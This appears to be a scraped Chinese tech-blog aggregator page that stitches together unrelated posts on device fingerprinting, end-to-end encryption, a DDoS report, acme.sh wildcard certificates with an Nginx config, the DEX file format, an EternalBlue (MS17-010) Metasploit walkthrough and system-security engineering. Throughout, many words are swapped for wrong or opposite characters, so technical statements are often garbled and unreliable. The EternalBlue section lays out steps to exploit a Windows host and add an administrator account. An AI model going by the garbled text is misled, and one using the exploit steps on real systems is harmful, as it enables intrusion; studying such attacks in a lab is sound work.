身为短跑爱好者,守业之前的谭翔从没有跑过1000米以上,“因为大学考试只有1000米”。守业之初公司安置在世纪公园旁边,看着他人跑步,开创团队个体心痒,决定一起尝试一下。后果,“一圈5公里,基本跑不下来”。14年下来,从“争取跑完一个全马”,到一年跑完5个以上全马,派拉团队不急不缓的积攒出了足够惊人的提高。“我对跑步很保持,但不执著,跑着跑着看到路边花开得很美,就会停下来去拍个照片”,指标明确,动摇而不执著,谭翔如是,派拉软件如是。

April 22, 2022 · 1 min · jiezi

关于安全:设备指纹技术的实现方式有哪些

设施指纹 指的是某设施的惟一标识特色,它以后次要是利用在电脑,手机以及pad等的互联网设施下面,这种技术有多种的实现形式,那么设施指纹技术的实现形式有哪些呢?明天就给大家具体介绍下。 1、主动式的设施指纹采集技术。它指的是被动地采集设施下面的固有的,不容易篡改和惟一的设施标记来作为设施指纹,它用于惟一的标识这个设施。为了保障设施指纹采集技术的唯一性和准确性,须要应用多个采集因素,而后把这些信息组合起来,再应用特定的算法来失去设施指纹的ID值。同时,还须要思考设施指纹的稳定性,它个别会联合其余的存储技术,把设施指纹长期的保存起来。 2、被动式的设施指纹采集技术。它指的是在终端设备和服务器通信的过程中,从数据报文的协定中,提取一些相干的特色集,再联合机器学习的算法,来标识和跟踪具体的终端设备。这种形式不在收集设施特色信息,它的应用更简略和间接,实用的范畴也很广。大部分的设施指纹技术商家提供的都是这类的设施指纹服务。 3、混合式的设施指纹采集技术。这种形式既有被动采集的局部,也有服务端算法的生成局部。它被动的去采集因素,而后和服务端进行交互,在通过一些算法进行混同加密,在服务端生成惟一的设施指纹识别ID,而后在写入惟一ID,存在缓存外面。 通过以上的内容,咱们曾经理解设施指纹技术的实现形式了,可见每种设施指纹技术的实现形式,都是有它的劣势所在的,同时也都存在肯定的局限性。对于混合式的设施指纹技术来说,它的适用范围还是很广的。

April 22, 2022 · 1 min · jiezi

关于安全:融云互联网通信安全系列之端到端加密技术

互联网通信技术的倒退利用,让信息无远弗届,连贯随时产生。关注【融云寰球互联网通信云】理解更多 但与此同时,互联网通信也暴露出了一系列平安问题。咱们须要有针对性地利用相干平安技术,加强通信零碎的安全性和可靠性,为爱护用户集体信息安全筑起防护墙。 在融云互联网通信安全系列文章首篇“链路平安”中,咱们介绍了对于链路加密的相干技术和实际。在传输即时通信音讯时启用 TLS 链路加密,保障音讯在达到服务器前无奈被窃听和篡改;应用 CA 认证机制,杜绝中间人攻打。 这些都是晋升客户端到服务器之间数据传输安全性的无效方法,然而未能解决用户间通信隐衷性和安全性面临的危险问题。因为在将数据传输到服务器之后,所有有权拜访此服务器的人,包含员工、相干供应商及其他无关人员甚至黑客,都有可能读取到用户的数据。 因而,端到端加密技术被鼎力推动,其呈现后很快被公众所认知并承受。在 WhatsApp、Signal、Telegram 等即时通信软件中都有所利用。 明天,咱们分享互联网通信安全系列文章的第三篇,率领大家一文读懂端到端音讯加密。 端到端加密方案设计思路说到端到端加密,咱们首先想到的解决方案是,在发送端发送音讯前对整个音讯进行加密,接收端接管到音讯后进行解密。这样,音讯直达服务器就无奈获取咱们的音讯内容了。 事实上,这的确是端到端加密中音讯收发的简化版解决方案,只是咱们在理论利用中要更加简单,成果也更加平安。 咱们须要先解决的前置问题是,如何平安地传递用于音讯加解密的密钥。 答案是用非对称加密的形式传输密钥,与 SSL / TLS 中平安替换密钥的形式相似。 非对称加密传输对称加密密钥的算法,个别归纳两种形式:一种是以 RSA、ECC 等为主的,公钥加密私钥解密的形式,实质是加解密的算法;另一种是以 DH、ECDH 为主的生成共享密钥的形式,实质是通过计算协商一个独特的密钥而不是加解密算法。 大部分即时通信软件中的端到端加密都采纳生成共享密钥的形式来传输会话密钥。这是为什么呢? 此处为了不便了解,附上 DH 算法介绍: 基于原根的定义及性质,能够定义 Diffie-Hellman 密钥替换算法。该算法形容如下: 有两个全局公开的参数,一个素数 q 和一个整数 a, a 是 q 的一个原根。假如用户 A 和 B 心愿替换一个密钥,用户 A 抉择一个作为公有密钥的随机数 XA(XA<q)< span="">,并计算公开密钥 YA=a^XA mod q。A 对 XA 的值窃密寄存而使 YA 能被 B 公开取得。相似地,用户 B 抉择一个公有的随机数 XB<q< span="">,并计算公开密钥 YB=a^XB mod q。B 对 XB 的值窃密寄存而使 YB 能被 A 公开取得。用户 A 产生共享机密密钥的计算形式是 K = (YB)^XA mod q。同样,用户 B 产生共享机密密钥的计算是 K = (YA)^XB mod q。这两个计算产生雷同的后果。推导过程如下: ...

April 19, 2022 · 3 min · jiezi

关于安全:报告|2021年DDoS-攻击态势年报发布从黑产角度分析2021年全年DDoS攻击态势

疫情之下,寰球数字化正在减速倒退,网络安全是数字化倒退的重要保障。与此同时,网络威逼日益加剧。DDoS 攻打作为网络安全的重要威逼之一,多年来攻打事件频发,新型攻打技术不断涌现、攻打量级一直增大,为网络安全、企业业务连续性带来了微小的挑战。 百度平安与联通数科作为多年来继续关注并致力于为客户提供DDoS 攻打防护解决方案的优良实践者,自2019年首次跨界牵手,联结编写公布DDoS 攻打态势报告以来,已间断3年继续致力于这项工作,同样也是收到了客户的宽泛认可。2022年单方继续发力联结编写并公布《2021年DDoS 攻打态势年报》,联合两家多年的业务平安实际积攒和黑灰产实战反抗教训,从黑产角度登程,对2021年全年的DDoS 攻打态势进行了整体总结与深度盘点:

April 19, 2022 · 1 min · jiezi

关于安全:Lets-Encrypt-泛域名证书申请

泛域名泛域名证书又名通配符证书是SSL证书中的其中一种模式,个别会以通配符的模式(如:*.domain.com)来指定证书所要爱护的域名。 OV证书和DV证书都会有通配符的域名模式提供,而EV证书个别没有通配符的证书模式。 1.配置灵便不便 因为采纳了通配符的模式对域名进行配置,那么对于领有多个二级域名的网站是一件十分便当的事件。只有申请一张通配符证书,就能用于所有的二级域名网站中。而且如果当前须要持续减少二级域名,也不须要再去申请购买证书,只需持续应用原有的证书就能够,对于网站管理者来说的确是十分的不便。 2.性价比高 一般而言,通配符证书是会比单域名证书会贵上不少,然而如果按每个二级域名的证书价格摊分下来,那其实证书单价是及其的低。当然这要看你的二级域名数量总数有多少而定。但现在互联网时代,很多公司企业他们都会用户多个二级域名。对于这些企业而言,通配符证书无疑是一种高性价比的SSL证书。 装置所需环境root@cby:~# apt-get install socat -yroot@cby:~# curl  https://get.acme.sh | sh  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0100   937    0   937    0     0    788      0 --:--:--  0:00:01 --:--:--   789  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100  210k  100  210k    0     0   131k      0  0:00:01  0:00:01 --:--:--  131k[Fri 15 Apr 2022 11:54:09 AM CST] Installing from online archive.[Fri 15 Apr 2022 11:54:09 AM CST] Downloading https://github.com/acmesh-official/acme.sh/archive/master.tar.gz[Fri 15 Apr 2022 11:54:11 AM CST] Extracting master.tar.gz[Fri 15 Apr 2022 11:54:11 AM CST] Installing to /root/.acme.sh[Fri 15 Apr 2022 11:54:11 AM CST] Installed to /root/.acme.sh/acme.sh[Fri 15 Apr 2022 11:54:11 AM CST] Installing alias to '/root/.bashrc'[Fri 15 Apr 2022 11:54:11 AM CST] OK, Close and reopen your terminal to start using acme.sh[Fri 15 Apr 2022 11:54:11 AM CST] Installing cron job49 0 * * * "/root/.acme.sh"/acme.sh --cron --home "/root/.acme.sh" > /dev/null[Fri 15 Apr 2022 11:54:11 AM CST] Good, bash is found, so change the shebang to use bash as preferred.[Fri 15 Apr 2022 11:54:12 AM CST] OK[Fri 15 Apr 2022 11:54:12 AM CST] Install success!root@cby:~# 进入导入环境变量并提出申请root@cby:~# cd .acme.sh/root@cby:~/.acme.sh# export DP_Id="abcd"root@cby:~/.acme.sh# export DP_Key="xxxxxxxxxx"root@cby:~/.acme.sh# ./acme.sh --issue --dns dns_dp -d *.oiox.cn -d oiox.cn[Fri 15 Apr 2022 12:05:13 PM CST] Using CA: https://acme.zerossl.com/v2/DV90[Fri 15 Apr 2022 12:05:13 PM CST] Multi domain='DNS:*.oiox.cn,DNS:oiox.cn'[Fri 15 Apr 2022 12:05:13 PM CST] Getting domain auth token for each domain[Fri 15 Apr 2022 12:05:38 PM CST] Getting webroot for domain='*.oiox.cn'[Fri 15 Apr 2022 12:05:38 PM CST] Getting webroot for domain='oiox.cn'[Fri 15 Apr 2022 12:05:39 PM CST] Adding txt value: DDuc5hd3b1RIoa5BefBkA53EpEtbAY0Fk8jOVVJcL6E for domain:  _acme-challenge.oiox.cn[Fri 15 Apr 2022 12:05:39 PM CST] Adding record[Fri 15 Apr 2022 12:05:39 PM CST] The txt record is added: Success.[Fri 15 Apr 2022 12:05:40 PM CST] Adding txt value: 43GHnhiHjyxCxsdHSDRDP_A4YqP8dDjc_9YgnkFNk5I for domain:  _acme-challenge.oiox.cn[Fri 15 Apr 2022 12:05:40 PM CST] Adding record[Fri 15 Apr 2022 12:05:40 PM CST] The txt record is added: Success.[Fri 15 Apr 2022 12:05:40 PM CST] Let's check each DNS record now. Sleep 20 seconds first.[Fri 15 Apr 2022 12:06:01 PM CST] You can use '--dnssleep' to disable public dns checks.[Fri 15 Apr 2022 12:06:01 PM CST] See: https://github.com/acmesh-official/acme.sh/wiki/dnscheck[Fri 15 Apr 2022 12:06:02 PM CST] Checking oiox.cn for _acme-challenge.oiox.cn[Fri 15 Apr 2022 12:06:04 PM CST] Domain oiox.cn '_acme-challenge.oiox.cn' success.[Fri 15 Apr 2022 12:06:04 PM CST] Checking oiox.cn for _acme-challenge.oiox.cn[Fri 15 Apr 2022 12:06:05 PM CST] Domain oiox.cn '_acme-challenge.oiox.cn' success.[Fri 15 Apr 2022 12:06:05 PM CST] All success, let's return[Fri 15 Apr 2022 12:06:05 PM CST] Verifying: *.oiox.cn[Fri 15 Apr 2022 12:06:17 PM CST] Processing, The CA is processing your order, please just wait. (1/30)[Fri 15 Apr 2022 12:06:24 PM CST] Success[Fri 15 Apr 2022 12:06:24 PM CST] Verifying: oiox.cn[Fri 15 Apr 2022 12:06:31 PM CST] Processing, The CA is processing your order, please just wait. (1/30)[Fri 15 Apr 2022 12:06:34 PM CST] Success[Fri 15 Apr 2022 12:06:34 PM CST] Removing DNS records.[Fri 15 Apr 2022 12:06:34 PM CST] Removing txt: DDuc5hd3b1RIoa5BefBkA53EpEtbAY0Fk8jOVVJcL6E for domain: _acme-challenge.oiox.cn[Fri 15 Apr 2022 12:06:35 PM CST] Removed: Success[Fri 15 Apr 2022 12:06:35 PM CST] Removing txt: 43GHnhiHjyxCxsdHSDRDP_A4YqP8dDjc_9YgnkFNk5I for domain: _acme-challenge.oiox.cn[Fri 15 Apr 2022 12:06:36 PM CST] Removed: Success[Fri 15 Apr 2022 12:06:36 PM CST] Verify finished, start to sign.[Fri 15 Apr 2022 12:06:36 PM CST] Lets finalize the order.[Fri 15 Apr 2022 12:06:36 PM CST] Le_OrderFinalize='https://acme.zerossl.com/v2/DV90/order/G4Sy37Y-eHjHX1wLMAh5nA/finalize'[Fri 15 Apr 2022 12:06:44 PM CST] Order status is processing, lets sleep and retry.[Fri 15 Apr 2022 12:06:44 PM CST] Retry after: 15[Fri 15 Apr 2022 12:07:00 PM CST] Polling order status: https://acme.zerossl.com/v2/DV90/order/G4Sy37Y-eHjHX1wLMAh5nA[Fri 15 Apr 2022 12:07:03 PM CST] Downloading cert.[Fri 15 Apr 2022 12:07:03 PM CST] Le_LinkCert='https://acme.zerossl.com/v2/DV90/cert/r4l-4WevkiEwiZA3U340ig'[Fri 15 Apr 2022 12:07:10 PM CST] Cert success.-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----[Fri 15 Apr 2022 12:07:10 PM CST] Your cert is in: /root/.acme.sh/*.oiox.cn/*.oiox.cn.cer[Fri 15 Apr 2022 12:07:10 PM CST] Your cert key is in: /root/.acme.sh/*.oiox.cn/*.oiox.cn.key[Fri 15 Apr 2022 12:07:10 PM CST] The intermediate CA cert is in: /root/.acme.sh/*.oiox.cn/ca.cer[Fri 15 Apr 2022 12:07:10 PM CST] And the full chain certs is there: /root/.acme.sh/*.oiox.cn/fullchain.cer查看已申请进去证书root@cby:~/.acme.sh# cd \*.oiox.cnroot@cby:~/.acme.sh/*.oiox.cn# lltotal 44drwxr-xr-x 2 root root 4096 Apr 15 12:07  ./drwx------ 8 root root 4096 Apr 15 11:55  ../-rw-r--r-- 1 root root 4399 Apr 15 12:07  ca.cer-rw-r--r-- 1 root root 6680 Apr 15 12:07  fullchain.cer-rw-r--r-- 1 root root 2281 Apr 15 12:07 '*.oiox.cn.cer'-rw-r--r-- 1 root root  563 Apr 15 12:07 '*.oiox.cn.conf'-rw-r--r-- 1 root root  956 Apr 15 12:05 '*.oiox.cn.csr'-rw-r--r-- 1 root root  156 Apr 15 12:05 '*.oiox.cn.csr.conf'-rw------- 1 root root 1675 Apr 15 11:55 '*.oiox.cn.key'root@cby:~/.acme.sh/*.oiox.cn#Nginx部署证书示例:server {        listen 80;        listen [::]:80;        listen 443 ssl;        listen [::]:443;        ssl_certificate /ssl/fullchain.cer;        ssl_certificate_key /ssl/*.oiox.cn.key;        ssl_session_timeout  5m;        ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4;        ssl_protocols TLSv1 TLSv1.1 TLSv1.2;        ssl_prefer_server_ciphers on;        server_name dns.oiox.cn;        root /var/www/dns;        index index.html;        location / {                try_files $uri $uri/ =404;        }}附录 ===== 下面应用DNSPOD进行动静解析申请证书阿里云DNS申请export Ali_Key="abcd"export Ali_Secret="xxxxxxxxxx"# RSA 证书acme.sh --issue --dns dns_ali -d blog.exsvc.cn -d *.exsvc.cn# ECC 证书acme.sh --issue --dns dns_ali -d blog.exsvc.cn -d *.exsvc.cn --keylength ec-256腾讯云DNS申请root@cby:~/.acme.sh# export DP_Id="abcd"root@cby:~/.acme.sh# export DP_Key="xxxxxxxxxx"root@cby:~/.acme.sh# ./acme.sh --issue --dns dns_dp -d *.oiox.cn -d oiox.cn更多申请形式见:https://github.com/acmesh-official/acme.sh/wiki/dnsapihttps://www.oiox.cn/ https://www.chenby.cn/ https://cby-chen.github.io/ https://weibo.com/u/5982474121 https://blog.csdn.net/qq\_33921750 https://my.oschina.net/u/3981543 https://www.zhihu.com/people/... https://segmentfault.com/u/hp... https://juejin.cn/user/331578... https://space.bilibili.com/35... https://cloud.tencent.com/dev... https://www.jianshu.com/u/0f8... https://www.toutiao.com/c/use... CSDN、GitHub、知乎、开源中国、思否、掘金、简书、腾讯云、哔哩哔哩、今日头条、新浪微博、集体博客、全网可搜《小陈运维》

April 15, 2022 · 1 min · jiezi

关于安全:重磅百度安全参编的国家标准信息安全技术-术语正式发布

近日,国家市场监督管理总局、国家标准化治理委员会公布了中华人民共和国国家标准布告(2022年第2号),百度平安参编的国家标准《信息安全技术 术语》正式获批公布,将代替GB/T 25069-2010版本国标,于2022年10月1日起正式施行。该规范由全国信息安全标准化技术委员会(SAC/TC260)归口。 图片全国信息安全标准化技术委员会官网发布新闻 信息安全技术术语是在信息安全畛域进行技术交换的根底语言,而对信息安全技术对立标准术语和定义,将有助于精确了解和表白技术内容,并不便技术交换和钻研。该规范根据信息安全技术畛域中已公布的国家标准(次要是SAC/TC260归口)和国际标准(次要是ISO/IECJTC1/SC27归口)中的术语和定义,对根本或通用的信息安全技术术语和定义进行了标准,实用于对信息安全技术概念的了解、其余信息安全技术标准的制订以及信息安全技术的国内外交换。 与前述版本GB/T25069—2010相比,除结构调整和编辑性改变外,该规范次要技术变动为在“术语和定义”中,引入了新的条目,更新了局部条目,删除了不罕用条目,勾销了原有分类,并减少了“术语分类”(分为“明码机制类”“甄别受权类”“计算安全类”“通信安全类”“利用安全类”“数据安全类”“平安服务类”“平安测评类”“平安治理类”九大类)。 图片《信息安全技术 术语》规范文稿首页 长期以来,百度平安被动践行信息安全畛域主管部门规范后行、规范引领的理念,深刻参加信息安全规范的钻研工作,踊跃推动信息安全规范的贯彻落实,加大开释规范效力。百度平安现累计参加制订国际标准、国家标准、行业标准、个人规范等210+项,其中包含国际标准IEEE P3219:《基于区块链的物联网零信赖框架》、ISO/IEC 27035-1:《信息技术—平安技术—信息安全事件治理》;国家标准《信息安全技术 物联网平安治理指南》;行业标准《云手机技术要求和测试方法》、《金融网络安全 Web应用服务平安测试通用标准》;个人规范《面向工业互联网的物联网终端平安技术要求》、《基于可信执行环境的 AI 模型爱护标准》等在内的一系列国内外前沿技术畛域规范我的项目。 将来,百度平安将持续投身到信息安全标准化工作当中,充分发挥本身技术势能,助力《国家标准化倒退大纲》的落地施行,继续为信息安全行业的衰弱、有序倒退奉献本人的力量。

April 12, 2022 · 1 min · jiezi

关于安全:顶象App加固技术解析DEX文件格式的详解

Android利用的源代码次要分为java与C/C++两局部,其中java编译后的文件是DEX文件,也是Android Dalvik虚拟机运行的程序,因而也是基于Android平台的虚机利用很难绕过的一种文件格式,重要性显而易见。 在顶象技术的 Android 加固解决方案中,有着DEX 壳爱护、指令虚拟化(将DEX文件运行在自实现的虚拟机环境下)等技术。要想理解顶象技术的Android 加固解决方案如何帮忙 Android 利用反抗逆向和破解,首先须要理解DEX文件到底是什么样的。 文件构造展现 DEX文件格式 DEX文件在010中的体现 文件构造详解 构造体定义 文件头( dex_header )。 magic[8]:dex版本标识。这类字节必须呈现在 .dex 文件的结尾,以便零碎将其原样辨认。该值会特意蕴含一个换行符("\n" 或 0x0a)和空字节("\0" 或 0x00),以便帮助检测某些模式的损坏问题。该值还能够将格局版本号编码为 3 个十进制数字;随着格局的演变,预计该值会枯燥递增。checksum:能够用于文件残余内容(除 magic 和此字段之外的所有内容)的 adler32 校验和。另外,还能够用于检测文件损坏状况。signature[kSha1DigestSize]:文件残余内容(除 magic、checksum 和此字段之外的所有内容)的 SHA-1 签名(哈希);用于对文件进行惟一标识。file_size:整个文件(包含标头)的大小,以字节为单位。header_size:标头(整个区段)的大小,以字节为单位。这一项容许至多肯定水平的向后/向前兼容性,而不用让格局生效。endian_tag:字节序标记。ENDIAN_CONSTANT ,示意小端字节序。REVERSE_ENDIAN_CONSTANT 示意大端字节序,默认值为 ENDIAN_CONSTANT 。link_size 与 link_off :链接区段的大小与文件偏移。如果此文件未进行动态链接,则两个值都为0。map_off:从文件结尾到映射项列表的文件偏移量。string_ids_size 与 string_ids_off:字符串标识符列表中的字符串数量与文件偏移。type_ids_size 与 type_ids_off:类型标识符列表中的元素数量及文件偏移。元素数量下限为65535。proto_ids_size 与 proto_ids_off:原型标识符列表中的元素数量及文件偏移。元素数量下限为65535。field_ids_size 与 field_ids_off:字段标识符列表中的元素数量及文件偏移。method_ids_size 与 method_ids_off:办法标识符列表中的元素数量及文件偏移。class_defs_size 与 class_defs_off:类定义列表中的元素数量及文件偏移。data_size 与 data_off :data区段的大小及文件偏移。 字符串标识符列表( dex_string_ids )在DEX文件以 DexStringId[] 的模式存在,其构造如下。 类型标识符列表( dex_type_ids )在DEX文件以 DexTypeId[] 的模式存在,其构造如下。 ...

April 12, 2022 · 1 min · jiezi

关于安全:小白复现永恒之蓝漏洞

1.原理介绍永恒之蓝是一种利用Windows零碎的SMB协定破绽造成溢出,最终导致任意命令的执行,从而获取零碎的最高权限的破绽。在Windows操作系统中,SMB服务默认是开启的。SMB(全称是Server Message Block)是一个协定服务器信息块,它是一种客户机/服务器、申请/响应协定,通过SMB协定能够在计算机间共享文件、打印机、命名管道等资源,网上邻居就是靠SMB实现的;SMB协定工作在应用层和会话层,能够用在TCP/IP协定之上,SMB应用TCP139端口和TCP445端口。 2.试验环境Kali 2020.4(攻击机) windows家庭版64位(靶机)永恒之蓝破绽的靶机只能是2017年前的windows 64位操作系统,32位零碎中该破绽不存在。 先顺次查看每个零碎的ip地址,而后互相ping,能够ping通即可开始复现 3.复现过程新版本的msf曾经集成MS17-010破绽的测试模块,能够用此间接测试。1.启动msf输出msfconsole启动,或者间接菜单页面启动msf程序 2.用nmap扫描靶机端口是否凋谢nmap的命令行的应用办法,具体能够参考链接https://www.cnblogs.com/php09...https://www.cnblogs.com/fengz... 3.搜寻ms17-010破绽利用模块ms17-010下有多个利用模块,本次次要用到编号1,2的两个模块 4.先用编号1的auxiliary/scanner/smb/smb_ms17_010扫描是否存在这一破绽和是否能够利用这一破绽设置靶机(set rhost)加IP地址,而后run执行命令 5.用编号2的攻打模块exploit/windows/smd/ms17_010_eternalbule攻打设置靶机,加载payload并且设置监听 6.利用胜利 能够查看零碎信息,增加一个新的用户并退出新用户到管理员组复现完结 4.防备办法1.及时更新零碎,永恒之蓝破绽在暴发后不久,微软就及时给出了更新补丁,当初依然存在此破绽的windows7及以上零碎极少。2.应用防火墙阻止445端口的连贯,或者应用进/出站规定阻止445端口的连贯。 博主为平安老手,文章内如有谬误帮我请指出,读者有无奈解决的问题也能够及时分割我。我在学习过程中也遇到过很多坑,不肯定能帮你全副解决,但可能也遇到过和你类似的问题。

April 11, 2022 · 1 min · jiezi

关于安全:Apsara-Stack-技术百科-数字化业务系统安全工程

简介:数字化平台曾经与咱们生存紧密结合,其用户规模宏大,一旦零碎呈现故障,势必会造成肯定生存的不便。比方疫情时代,衰弱码曾经成为人们出门必备的条件,一旦提供衰弱码服务平台呈现故障,出行将变得举步维艰。因而,系统安全问题成为威逼企业失常运行的重大危险,其平安稳固将变的越来越重要。 数字化时代,如果说哪些信息是最受关注的,能不能上“热搜”肯定是评估的办法之一。在每天进入“热搜”的新闻中,有一类事件不仅上热搜的频率高,并且热搜的名称格局也高度对立,那就是“某某崩了”或者“某某打不开了”。这里“某某”指那些与咱们生存非亲非故的数字化平台,可能是购物平台,也可能是信息分享平台。之所以人们如此的关注这类事件,因为这些数字化平台曾经与咱们生存紧密结合,其用户规模宏大,一旦零碎呈现故障,势必会造成肯定生存的不便。比方疫情时代,衰弱码曾经成为人们出门必备的条件,一旦提供衰弱码服务平台呈现故障,出行将变得举步维艰。 系统安全问题成为威逼企业失常运行的重大危险数字化零碎在给咱们生存带来便当的同时,也晋升了他在人们生存中的重要性,一旦零碎呈现故障,不仅仅会影响到业务的失常运行,也会影响到用户的日常生活和体验。因而,系统安全问题成为威逼企业失常运行的重大危险,其平安稳固将变的越来越重要。 在此背景下,一方面企业开始加大系统安全畛域的投入,另一方面国家监管要求也变得越来越高。2021年6月10日,第十三届全国人民代表大会通过了《全国人民代表大会常务委员会对于批改[中华人民共和国平安生产法]的决定》,自2021年9月1日施行。新平安生产法首次提出平台经济等新兴行业、畛域的生产经营单位该当依据本行业、畛域的特点,建立健全并落实全员平安生产责任制,增强从业人员平安生产教育和培训,履行无关平安生产任务。在工信部和应急管理部印发《“工业互联网+平安生产”行动计划(2021-2023年)》中,也提出了要加强工业平安生产的感知、监测、预警、处理和评估能力,减速平安生产从动态剖析向动静感知、预先应急向事先预防、单点防控向全局联防的转变,晋升工业生产实质平安程度。 外部危险成为威逼系统安全的次要危险之一在影响零碎稳固和平安的起因中,依照其产生的主体,能够分为内部平安和外部平安,内部平安指常见因为黑客攻击、木马、DDOS攻打等起因导致的系统安全问题,而外部平安则是由误操作、变更故障、程序缺点、硬件故障等起因导致的系统安全问题。内部平安属于信息安全的笼罩域,目前曾经绝对成熟,而外部危险的管制还是薄弱环节。 通过对企业外部平安故障起因剖析能够发现,其中变更类故障导致的平安问题约占60-70%,环境变动类故障(如流量过大)导致的问题约占约15-25%,硬件类故障约占约5-15%。由此可见,因为变更危险导致的系统安全问题是威逼系统安全的次要危险之一。 传统危险管制办法难以解决外部危险带来的系统安全挑战传统变更危险的管制是通过制度标准、宣贯、审批等形式来进行管制,因为危险管制复杂性,通过传统形式进行危险管控存在较大挑战,次要体现在: 1)产品更新迭代快,仅靠制度和人工审核管制危险难度大。因为目前数字化产品研发谋求敏捷性,产品迭代频繁,可能导致系统故障产生频繁,而规章制度难以深刻到产品研发、运维细节中,执行难度较大。通过人工审核、审批的形式老本高,难以间接量化危险,在须要大量审核的场景下,容易漠视危险。 2)系统安全波及范围广,管制老本高。范围广次要体现在数字化零碎和人员范围广,数字化零碎包含重要业务零碎、相应变更零碎(云资源变更、利用变更、业务变更);人员包含产品、研发、测试、运维、经营人员等。 3)点状危险管制计划难以无效管制危险,管制成果差。危险管制是简单系统工程,管制成果受短板影响显著,没有体系化管制伎俩,难无效管制危险产生。 解决方案实际系统故障诱因简单,这导致单点管制很难解决问题,须要一个系统化解决方案。第一届天猫双十一,开发和运维人员须要整夜保障,随时解决呈现的问题,即使这样,也会出一些意想不到的故障。2020年双十一用户数量和销售规模与第一届双十一比照,曾经不可同日而语,零碎也更加简单,但双十一大促零碎保障过程却越来越晦涩,保障人数也在继续升高,这背地就是一个系统化解决方案。 组织的顶层设计 组织设计是指从组织层面设置专门组织机构来负责零碎稳固和平安,包含最高层平安生产委员会和各个研发部门稳定性负责人。平安生产委员会职能包含负责全局稳定性决策、平安生产规定制订、整体应急协同、平安文化造就、全局管控零碎的布局与治理。当故障产生时,由相干人员负责故障应急与兼顾,各研发部门稳定性负责人负责各零碎危险治理和稳定性保障,在研发、运维过程中防止系统故障呈现。 事先的危险预防 